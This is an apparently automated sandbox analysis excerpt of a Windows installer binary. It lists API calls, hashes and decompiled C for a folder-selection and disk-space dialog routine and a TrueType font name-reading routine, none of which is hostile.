                                                                                                                                                    0x00404b0b
                                                                                                                                                    0x00404b14
                                                                                                                                                    0x00404bd6
                                                                                                                                                    0x00404bea
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00404b1a
                                                                                                                                                    0x00404b20
                                                                                                                                                    0x00404b28
                                                                                                                                                    0x00404b28
                                                                                                                                                    0x00404b2b
                                                                                                                                                    0x00404b32
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00404b3b
                                                                                                                                                    0x00404b3e
                                                                                                                                                    0x00404b42
                                                                                                                                                    0x00404b45
                                                                                                                                                    0x00404b4a
                                                                                                                                                    0x00404b51
                                                                                                                                                    0x00404b58
                                                                                                                                                    0x00404b5b
                                                                                                                                                    0x00404b5e
                                                                                                                                                    0x00404b63
                                                                                                                                                    0x00404b91
                                                                                                                                                    0x00404bb1
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00404bb1
                                                                                                                                                    0x00404ba2
                                                                                                                                                    0x00404b65
                                                                                                                                                    0x00404b6f
                                                                                                                                                    0x00404b76
                                                                                                                                                    0x00404b7d
                                                                                                                                                    0x00404b7f
                                                                                                                                                    0x00404b82
                                                                                                                                                    0x00404bb3
                                                                                                                                                    0x00404bb3
                                                                                                                                                    0x00404bb9
                                                                                                                                                    0x00404bb9
                                                                                                                                                    0x00404bbc
                                                                                                                                                    0x00404bbc
                                                                                                                                                    0x00404bc3
                                                                                                                                                    0x00404bc4
                                                                                                                                                    0x00404bd4
                                                                                                                                                    0x00404bf0
                                                                                                                                                    0x00404bf4
                                                                                                                                                    0x00404c11
                                                                                                                                                    0x00404c16
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00404c16
                                                                                                                                                    0x00404bfb
                                                                                                                                                    0x00404c04
                                                                                                                                                    0x00404f89
                                                                                                                                                    0x00404f9b
                                                                                                                                                    0x00404f9b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00404bd4
                                                                                                                                                    0x00404b14

                                                                                                                                                    APIs
                                                                                                                                                    • GetDlgItem.USER32 ref: 004049BF
                                                                                                                                                    • GetDlgItem.USER32 ref: 004049CC
                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 00404A1B
                                                                                                                                                    • LoadBitmapW.USER32(0000006E), ref: 00404A2E
                                                                                                                                                    • SetWindowLongW.USER32 ref: 00404A48
                                                                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A5A
                                                                                                                                                    • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A6E
                                                                                                                                                    • SendMessageW.USER32(?,00001109,00000002), ref: 00404A84
                                                                                                                                                    • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A90
                                                                                                                                                    • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404AA0
                                                                                                                                                    • DeleteObject.GDI32(?), ref: 00404AA5
                                                                                                                                                    • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AD0
                                                                                                                                                    • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ADC
                                                                                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B7D
                                                                                                                                                    • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404BA0
                                                                                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404BB1
                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00404BDB
                                                                                                                                                    • SetWindowLongW.USER32 ref: 00404BEA
                                                                                                                                                    • ShowWindow.USER32(?,00000005), ref: 00404BFB
                                                                                                                                                    • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CF9
                                                                                                                                                    • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D54
                                                                                                                                                    • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D69
                                                                                                                                                    • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D8D
                                                                                                                                                    • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DB3
                                                                                                                                                    • ImageList_Destroy.COMCTL32(?), ref: 00404DC8
                                                                                                                                                    • GlobalFree.KERNEL32 ref: 00404DD8
                                                                                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E48
                                                                                                                                                    • SendMessageW.USER32(?,00001102,?,?), ref: 00404EF6
                                                                                                                                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F05
                                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00404F25
                                                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 00404F75
                                                                                                                                                    • GetDlgItem.USER32 ref: 00404F80
                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 00404F87
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.367328755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.367323943.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367337017.0000000000409000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367342716.000000000040C000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367348180.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367363484.000000000046B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367373378.0000000000534000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                    • String ID: $ @$M$N
                                                                                                                                                    • API String ID: 1638840714-3479655940
                                                                                                                                                    • Opcode ID: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                                                                                                                                    • Instruction ID: ef4bce446953bc7ec7e60756d12a1063aab4f745b4df8f164389f1335a379dc2
                                                                                                                                                    • Opcode Fuzzy Hash: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                                                                                                                                    • Instruction Fuzzy Hash: 7B028DB090020AAFEF109F95CD45AAE7BB5FB84314F10417AF611BA2E1C7B89D91CF58
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004044D1, Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 300stringkeyboardCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 79%
                                                                                                                                                    			E004044D1(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				struct HWND__* _v12;
				long _v16;
				long _v20;
				char _v24;
				long _v28;
				char _v32;
				intOrPtr _v36;
				long _v40;
				signed int _v44;
				WCHAR* _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				WCHAR* _v68;
				void _v72;
				char _v76;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t86;
				long _t91;
				short* _t93;
				void* _t99;
				signed int _t100;
				void* _t120;
				void* _t125;
				signed int _t126;
				char* _t131;
				intOrPtr* _t146;
				struct HWND__* _t150;
				signed int _t160;
				short* _t161;
				struct HWND__* _t162;
				signed int _t165;
				signed int _t173;
				intOrPtr _t179;
				WCHAR* _t183;
				int _t184;

				_t86 =  *0x461db8;
				_v36 = _t86;
				_t183 = 0x47f000 +  *(_t86 + 0x3c) * 0x4008;
				_v8 =  *((intOrPtr*)(_t86 + 0x38));
				if(_a8 != 0x40b) {
					L3:
					if(_a8 != 0x110) {
						L12:
						if(_a8 != 0x111) {
							L24:
							if(_a8 == 0x40f) {
								L26:
								_v8 = _v8 & 0x00000000;
								_v12 = _v12 & 0x00000000;
								E00405CB0(0x3fb, _t183);
								if(E004067AA(_t203, _t183) == 0) {
									_v8 = 1;
								}
								E00406035(0x44dd90, _t183);
								_t160 = 0;
								_t91 = E00406328(0);
								_v16 = _t91;
								if(_t91 == 0) {
									L35:
									E00406035(0x44dd90, _t183);
									_t93 = E00405D85(0x44dd90);
									if(_t93 != _t160) {
										 *_t93 = 0;
									}
									if(GetDiskFreeSpaceW(0x44dd90,  &_v20,  &_v28,  &_v16,  &_v40) == 0) {
										_t173 = _a4;
										goto L41;
									} else {
										_t184 = 0x400;
										_t173 = MulDiv(_v20 * _v28, _v16, 0x400);
										_v12 = 1;
										goto L42;
									}
								} else {
									if(0 == 0x44dd90) {
										L34:
										_t160 = 0;
										goto L35;
									} else {
										goto L30;
									}
									while(1) {
										L30:
										_t120 = _v16(0x44dd90,  &_v44,  &_v24,  &_v32);
										if(_t120 != 0) {
											break;
										}
										if(_t160 != 0) {
											 *_t160 = _t120;
										}
										_t161 = E0040677D(0x44dd90);
										 *_t161 = 0;
										_t160 = _t161 - 2;
										_t125 = 0x5c;
										 *_t160 = _t125;
										if(_t160 != 0x44dd90) {
											continue;
										} else {
											goto L34;
										}
									}
									_t173 = (_v40 << 0x00000020 | _v44) >> 0xa;
									_v12 = 1;
									_t160 = 0;
									L41:
									_t184 = 0x400;
									L42:
									_t99 = E004044A2(5);
									if(_v12 != _t160 && _t173 < _t99) {
										_v8 = 2;
									}
									if( *((intOrPtr*)( *0x476a88 + 0x10)) != _t160) {
										E004043D9(_t99, 0x3ff, 0xfffffffb);
										if(_v12 == _t160) {
											SetDlgItemTextW(_a4, _t184, 0x40a264);
										} else {
											E004043D9(_t173, _t184, 0xfffffffc);
										}
									}
									_t100 = _v8;
									 *0x47eb84 = _t100;
									if(_t100 == _t160) {
										_v8 = E0040141D(7);
									}
									if(( *(_v36 + 0x14) & _t184) != 0) {
										_v8 = _t160;
									}
									E00403DB1(0 | _v8 == _t160);
									if(_v8 == _t160 &&  *0x441d5c == _t160) {
										E00403D8D();
									}
									 *0x441d5c = _t160;
									goto L57;
								}
							}
							_t203 = _a8 - 0x405;
							if(_a8 != 0x405) {
								goto L57;
							}
							goto L26;
						}
						_t126 = _a12 & 0x0000ffff;
						if(_t126 != 0x3fb) {
							L16:
							if(_t126 == 0x3e9) {
								_t165 = 7;
								memset( &_v72, 0, _t165 << 2);
								_v76 = _a4;
								_v68 = 0x451d98;
								_v56 = E00403F90;
								_v52 = _t183;
								_v64 = E00406831(0x3fb, 0x451d98, _t183, 0x441d78, _v8);
								_t131 =  &_v76;
								_v60 = 0x41;
								__imp__SHBrowseForFolderW(_t131);
								if(_t131 == 0) {
									_a8 = 0x40f;
								} else {
									__imp__CoTaskMemFree(_t131);
									E0040674E(_t183);
									_t134 =  *((intOrPtr*)( *0x47eabc + 0x11c));
									if( *((intOrPtr*)( *0x47eabc + 0x11c)) != 0 && _t183 == 0x4d30a8) {
										E00406831(0x3fb, 0x451d98, _t183, 0, _t134);
										if(lstrcmpiW(0x46e220, 0x451d98) != 0) {
											lstrcatW(_t183, 0x46e220);
										}
									}
									 *0x441d5c =  *0x441d5c + 1;
									SetDlgItemTextW(_a4, 0x3fb, _t183);
								}
							}
							goto L24;
						}
						if(_a12 >> 0x10 != 0x300) {
							goto L57;
						}
						_a8 = 0x40f;
						goto L16;
					} else {
						_v12 = GetDlgItem(_a4, 0x3fb);
						if((0x00008000 & GetAsyncKeyState(0x10)) == 0) {
							_t162 = _a4;
						} else {
							_t162 = _a4;
							_t150 = GetDlgItem(_t162, 0x3f0);
							_push(0xffffffe0);
							_push(8);
							E00403D6B(_t162);
							ShowWindow(_t150, 8);
						}
						if(E00405D51(_t183) != 0 && E00405D85(_t183) == 0) {
							E0040674E(_t183);
						}
						 *0x476a68 = _t162;
						SetWindowTextW(_v12, _t183);
						_t179 = _a16;
						_push( *((intOrPtr*)(_t179 + 0x34)));
						_push(1);
						E00403D6B(_t162);
						_push( *((intOrPtr*)(_t179 + 0x30)));
						_push(0x14);
						E00403D6B(_t162);
						E00403DC4(_v12);
						_t146 = E00406328(7);
						if(_t146 == 0) {
							L57:
							return E00403DF6(_a8, _a12, _a16);
						}
						 *_t146(_v12, 1);
						goto L12;
					}
				}
				E00405CB0(0x3fb, _t183);
				E00406064(_t183);
				E00403EA0();
				if(GetDlgItem(_a4, 0x3f0) == 0) {
					goto L57;
				} else {
					 *0x46d204 = IsDlgButtonChecked(_a4, 0x3f0);
					goto L3;
				}
			}










































                                                                                                                                                    0x004044d7
                                                                                                                                                    0x004044e7
                                                                                                                                                    0x004044ed
                                                                                                                                                    0x00404501
                                                                                                                                                    0x00404509
                                                                                                                                                    0x0040453e
                                                                                                                                                    0x00404545
                                                                                                                                                    0x004045ec
                                                                                                                                                    0x004045f8
                                                                                                                                                    0x004046d0
                                                                                                                                                    0x004046d7
                                                                                                                                                    0x004046e6
                                                                                                                                                    0x004046e6
                                                                                                                                                    0x004046ea
                                                                                                                                                    0x004046f0
                                                                                                                                                    0x004046fd
                                                                                                                                                    0x004046ff
                                                                                                                                                    0x004046ff
                                                                                                                                                    0x0040470d
                                                                                                                                                    0x00404712
                                                                                                                                                    0x00404715
                                                                                                                                                    0x0040471a
                                                                                                                                                    0x0040471f
                                                                                                                                                    0x0040475e
                                                                                                                                                    0x00404760
                                                                                                                                                    0x00404766
                                                                                                                                                    0x0040476d
                                                                                                                                                    0x00404771
                                                                                                                                                    0x00404771
                                                                                                                                                    0x0040478d
                                                                                                                                                    0x004047c9
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040478f
                                                                                                                                                    0x00404796
                                                                                                                                                    0x004047a6
                                                                                                                                                    0x004047a8
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004047a8
                                                                                                                                                    0x00404721
                                                                                                                                                    0x00404725
                                                                                                                                                    0x0040475c
                                                                                                                                                    0x0040475c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00404727
                                                                                                                                                    0x00404727
                                                                                                                                                    0x00404734
                                                                                                                                                    0x00404739
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040473d
                                                                                                                                                    0x0040473f
                                                                                                                                                    0x0040473f
                                                                                                                                                    0x00404748
                                                                                                                                                    0x0040474c
                                                                                                                                                    0x0040474f
                                                                                                                                                    0x00404754
                                                                                                                                                    0x00404755
                                                                                                                                                    0x0040475a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040475a
                                                                                                                                                    0x004047b7
                                                                                                                                                    0x004047be
                                                                                                                                                    0x004047c5
                                                                                                                                                    0x004047cc
                                                                                                                                                    0x004047cc
                                                                                                                                                    0x004047d1
                                                                                                                                                    0x004047d3
                                                                                                                                                    0x004047db
                                                                                                                                                    0x004047e1
                                                                                                                                                    0x004047e1
                                                                                                                                                    0x004047f1
                                                                                                                                                    0x004047fa
                                                                                                                                                    0x00404802
                                                                                                                                                    0x00404819
                                                                                                                                                    0x00404804
                                                                                                                                                    0x00404809
                                                                                                                                                    0x00404809
                                                                                                                                                    0x00404802
                                                                                                                                                    0x0040481e
                                                                                                                                                    0x00404821
                                                                                                                                                    0x00404828
                                                                                                                                                    0x00404831
                                                                                                                                                    0x00404831
                                                                                                                                                    0x0040483a
                                                                                                                                                    0x0040483c
                                                                                                                                                    0x0040483c
                                                                                                                                                    0x00404848
                                                                                                                                                    0x00404850
                                                                                                                                                    0x0040485a
                                                                                                                                                    0x0040485a
                                                                                                                                                    0x0040485f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040485f
                                                                                                                                                    0x0040471f
                                                                                                                                                    0x004046d9
                                                                                                                                                    0x004046e0
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004046e0
                                                                                                                                                    0x004045fe
                                                                                                                                                    0x00404604
                                                                                                                                                    0x00404621
                                                                                                                                                    0x00404626
                                                                                                                                                    0x0040462e
                                                                                                                                                    0x00404637
                                                                                                                                                    0x00404646
                                                                                                                                                    0x00404649
                                                                                                                                                    0x0040464c
                                                                                                                                                    0x00404653
                                                                                                                                                    0x0040465b
                                                                                                                                                    0x0040465e
                                                                                                                                                    0x00404662
                                                                                                                                                    0x00404669
                                                                                                                                                    0x00404671
                                                                                                                                                    0x004046c9
                                                                                                                                                    0x00404673
                                                                                                                                                    0x00404674
                                                                                                                                                    0x0040467b
                                                                                                                                                    0x00404685
                                                                                                                                                    0x0040468d
                                                                                                                                                    0x0040469a
                                                                                                                                                    0x004046ae
                                                                                                                                                    0x004046b2
                                                                                                                                                    0x004046b2
                                                                                                                                                    0x004046ae
                                                                                                                                                    0x004046b7
                                                                                                                                                    0x004046c2
                                                                                                                                                    0x004046c2
                                                                                                                                                    0x00404671
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00404626
                                                                                                                                                    0x00404614
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040461a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040454b
                                                                                                                                                    0x00404557
                                                                                                                                                    0x00404568
                                                                                                                                                    0x00404588
                                                                                                                                                    0x0040456a
                                                                                                                                                    0x0040456b
                                                                                                                                                    0x0040456f
                                                                                                                                                    0x00404571
                                                                                                                                                    0x00404573
                                                                                                                                                    0x00404578
                                                                                                                                                    0x00404580
                                                                                                                                                    0x00404580
                                                                                                                                                    0x00404593
                                                                                                                                                    0x004045a0
                                                                                                                                                    0x004045a0
                                                                                                                                                    0x004045a9
                                                                                                                                                    0x004045af
                                                                                                                                                    0x004045b5
                                                                                                                                                    0x004045b8
                                                                                                                                                    0x004045bb
                                                                                                                                                    0x004045be
                                                                                                                                                    0x004045c3
                                                                                                                                                    0x004045c6
                                                                                                                                                    0x004045c9
                                                                                                                                                    0x004045d1
                                                                                                                                                    0x004045d8
                                                                                                                                                    0x004045df
                                                                                                                                                    0x00404865
                                                                                                                                                    0x00404877
                                                                                                                                                    0x00404877
                                                                                                                                                    0x004045ea
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004045ea
                                                                                                                                                    0x00404545
                                                                                                                                                    0x00404511
                                                                                                                                                    0x00404517
                                                                                                                                                    0x0040451c
                                                                                                                                                    0x00404529
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040452f
                                                                                                                                                    0x00404539
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00404539

                                                                                                                                                    APIs
                                                                                                                                                    • GetDlgItem.USER32 ref: 00404525
                                                                                                                                                    • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404533
                                                                                                                                                    • GetDlgItem.USER32 ref: 00404553
                                                                                                                                                    • GetAsyncKeyState.USER32(00000010), ref: 0040455A
                                                                                                                                                    • GetDlgItem.USER32 ref: 0040456F
                                                                                                                                                    • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404580
                                                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 004045AF
                                                                                                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 00404669
                                                                                                                                                    • lstrcmpiW.KERNEL32(0046E220,00451D98,00000000,?,?), ref: 004046A6
                                                                                                                                                    • lstrcatW.KERNEL32(?,0046E220), ref: 004046B2
                                                                                                                                                    • SetDlgItemTextW.USER32 ref: 004046C2
                                                                                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 00404674
                                                                                                                                                      • Part of subcall function 00405CB0: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403FAD), ref: 00405CC3
                                                                                                                                                      • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                      • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                      • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                      • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                      • Part of subcall function 00403EA0: lstrcatW.KERNEL32(00000000,00000000), ref: 00403EBB
                                                                                                                                                    • GetDiskFreeSpaceW.KERNEL32(0044DD90,?,?,0000040F,?,0044DD90,0044DD90,?,00000000,0044DD90,?,?,000003FB,?), ref: 00404785
                                                                                                                                                    • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047A0
                                                                                                                                                      • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00425AD2,74B5EA30,00000000), ref: 00406902
                                                                                                                                                    • SetDlgItemTextW.USER32 ref: 00404819
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.367328755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.367323943.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367337017.0000000000409000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367342716.000000000040C000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367348180.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367363484.000000000046B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367373378.0000000000534000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                                                                                                                    • String ID: F$A
                                                                                                                                                    • API String ID: 3347642858-1281894373
                                                                                                                                                    • Opcode ID: a5fa6dd7612635b06afd7bdf928a1f1f12882f9767dd20a4809df49b26cd99e9
                                                                                                                                                    • Instruction ID: 610cab7253faed09e83e35c18a41c8795a2522a57bd741f73bb79fe4ae4f2c97
                                                                                                                                                    • Opcode Fuzzy Hash: a5fa6dd7612635b06afd7bdf928a1f1f12882f9767dd20a4809df49b26cd99e9
                                                                                                                                                    • Instruction Fuzzy Hash: A3B181B1900209BBDB11AFA1CC85AAF7BB8EF45315F10843BFA05B72D1D77C9A418B59
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00406EFE, Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 270filestringCOMMONCrypto
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 98%
                                                                                                                                                    			E00406EFE(WCHAR* _a4, intOrPtr _a8, WCHAR* _a12, int _a16) {
				struct _OVERLAPPED* _v8;
				void* _v12;
				long _v16;
				struct _OVERLAPPED* _v20;
				struct _OVERLAPPED* _v24;
				char _v28;
				signed short _v32;
				signed short _v34;
				void _v36;
				signed short _v44;
				signed int _v46;
				void _v48;
				signed short _v54;
				signed int _v56;
				signed short _v58;
				signed int _v60;
				void _v64;
				unsigned int _v68;
				unsigned int _v72;
				char _v80;
				void* _t93;
				signed short _t102;
				long _t125;
				signed short _t133;
				signed short _t140;
				void* _t149;
				signed char* _t155;
				struct _OVERLAPPED* _t158;
				signed short _t166;
				signed short _t202;
				signed short _t234;
				signed short _t236;
				signed int _t238;
				void* _t240;

				_t158 = 0;
				_v20 = 0;
				_v16 = 0;
				_t93 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0x80, 0);
				_v12 = _t93;
				if(_t93 != 0xffffffff) {
					ReadFile(_t93,  &_v48, 0xc,  &_v16, 0);
					_t234 = _v44 >> 0x00000008 & 0x000000ff | (_v44 & 0x000000ff) << 0x00000008;
					_t102 = _v48 >> 0x00000008 & 0x000000ff | (_v48 & 0x000000ff) << 0x00000008;
					_v44 = _t234;
					_t166 = _v46 >> 0x00000008 & 0x000000ff | (_v46 & 0x000000ff) << 0x00000008;
					_v48 = _t102;
					_v46 = _t166;
					if(_t102 != 1 || _t166 != 0) {
						return 0;
					} else {
						_v8 = 0;
						if(0 >= _t234) {
							L17:
							CloseHandle(_v12);
							L18:
							return _v20;
						} else {
							goto L5;
						}
						while(1) {
							L5:
							ReadFile(_v12,  &_v80, 0x10,  &_v16, _t158);
							lstrcpynA( &_v28,  &_v80, 5);
							_v24 = _t158;
							if(lstrcmpA("name",  &_v28) == 0) {
								break;
							}
							_v8 =  &(_v8->Internal);
							if(_v8 < (_v44 & 0x0000ffff)) {
								continue;
							}
							goto L17;
						}
						_v68 = ((_v68 & 0x000000ff) << 0x00000008 & 0x0000ffff | _v68 >> 0x00000008 & 0x000000ff) << 0x00000010 | (_v68 >> 0x00000010 & 0x000000ff) << 0x00000008 & 0x0000ffff | _v68 >> 0x00000010 >> 0x00000008 & 0x000000ff;
						_t125 = ((_v72 & 0x000000ff) << 0x00000008 & 0x0000ffff | _v72 >> 0x00000008 & 0x000000ff) << 0x00000010 | (_v72 >> 0x00000010 & 0x000000ff) << 0x00000008 & 0x0000ffff | _v72 >> 0x00000010 >> 0x00000008 & 0x000000ff;
						_v72 = _t125;
						SetFilePointer(_v12, _t125, _t158, _t158);
						ReadFile(_v12,  &_v36, 6,  &_v16, _t158);
						_t133 = _v34 >> 0x00000008 & 0x000000ff | (_v34 & 0x000000ff) << 0x00000008;
						_v32 = _v32 >> 0x00000008 & 0x000000ff | (_v32 & 0x000000ff) << 0x00000008;
						_v34 = _t133;
						_v8 = _t158;
						if(0 >= _t133) {
							goto L17;
						} else {
							goto L9;
						}
						while(1) {
							L9:
							ReadFile(_v12,  &_v64, 0xc,  &_v16, _t158);
							_t140 = _v58 >> 0x00000008 & 0x000000ff | (_v58 & 0x000000ff) << 0x00000008;
							_v64 = _v64 >> 0x00000008 & 0x000000ff | (_v64 & 0x000000ff) << 0x00000008;
							_v58 = _t140;
							_v60 = _v60 >> 0x00000008 & 0x000000ff | (_v60 & 0x000000ff) << 0x00000008;
							_t236 = _v56 >> 0x00000008 & 0x000000ff | (_v56 & 0x000000ff) << 0x00000008;
							_t202 = _v54 >> 0x00000008 & 0x000000ff | (_v54 & 0x000000ff) << 0x00000008;
							_v56 = _t236;
							_v54 = _t202;
							if((_t140 & 0x0000ffff) == _a8 && _v64 == 3 && _v60 == 0x409) {
								break;
							}
							_v8 =  &(_v8->Internal);
							if(_v8 < (_v34 & 0x0000ffff)) {
								continue;
							}
							goto L17;
						}
						_t238 = (_t236 & 0x0000ffff) >> 1;
						SetFilePointer(_v12, (_v32 & 0x0000ffff) + (_t202 & 0x0000ffff) + _v72, _t158, _t158);
						_t149 = GlobalAlloc(0x40, (_v56 & 0x0000ffff) + 2);
						_v8 = _t149;
						ReadFile(_v12, _t149, _v56 & 0x0000ffff,  &_v16, _t158);
						if(_t238 <= _t158) {
							L16:
							_t240 = _v8;
							 *((short*)(_t240 + _t238 * 2)) = 0;
							lstrcpynW(_a12, _t240, _a16);
							_v20 = 1;
							GlobalFree(_t240);
							goto L17;
						} else {
							goto L15;
						}
						do {
							L15:
							_t155 = _v8 + _t158 * 2;
							_t158 =  &(_t158->Internal);
							 *_t155 = _t155[1] & 0x000000ff | ( *_t155 & 0x000000ff) << 0x00000008;
						} while (_t158 < _t238);
						goto L16;
					}
				}
				_push(_a4);
				E004062CF(L"%s: failed opening file \"%s\"\n", L"GetTTFNameString");
				goto L18;
			}





































                                                                                                                                                    0x00406f07
                                                                                                                                                    0x00406f1c
                                                                                                                                                    0x00406f1f
                                                                                                                                                    0x00406f22
                                                                                                                                                    0x00406f28
                                                                                                                                                    0x00406f2e
                                                                                                                                                    0x00406f5c
                                                                                                                                                    0x00406f77
                                                                                                                                                    0x00406f87
                                                                                                                                                    0x00406f8a
                                                                                                                                                    0x00406f9b
                                                                                                                                                    0x00406f9e
                                                                                                                                                    0x00406fa2
                                                                                                                                                    0x00406faa
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00406fb9
                                                                                                                                                    0x00406fbb
                                                                                                                                                    0x00406fc1
                                                                                                                                                    0x0040720f
                                                                                                                                                    0x00407212
                                                                                                                                                    0x00407218
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00406fc7
                                                                                                                                                    0x00406fc7
                                                                                                                                                    0x00406fd5
                                                                                                                                                    0x00406fe1
                                                                                                                                                    0x00406ff0
                                                                                                                                                    0x00406ffb
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00407001
                                                                                                                                                    0x00407007
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00407009
                                                                                                                                                    0x0040704f
                                                                                                                                                    0x00407076
                                                                                                                                                    0x0040707d
                                                                                                                                                    0x00407080
                                                                                                                                                    0x00407094
                                                                                                                                                    0x004070ab
                                                                                                                                                    0x004070be
                                                                                                                                                    0x004070c4
                                                                                                                                                    0x004070c8
                                                                                                                                                    0x004070ce
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004070d4
                                                                                                                                                    0x004070d4
                                                                                                                                                    0x004070e2
                                                                                                                                                    0x004070f9
                                                                                                                                                    0x00407110
                                                                                                                                                    0x00407114
                                                                                                                                                    0x0040712c
                                                                                                                                                    0x00407141
                                                                                                                                                    0x00407154
                                                                                                                                                    0x00407157
                                                                                                                                                    0x0040715b
                                                                                                                                                    0x00407162
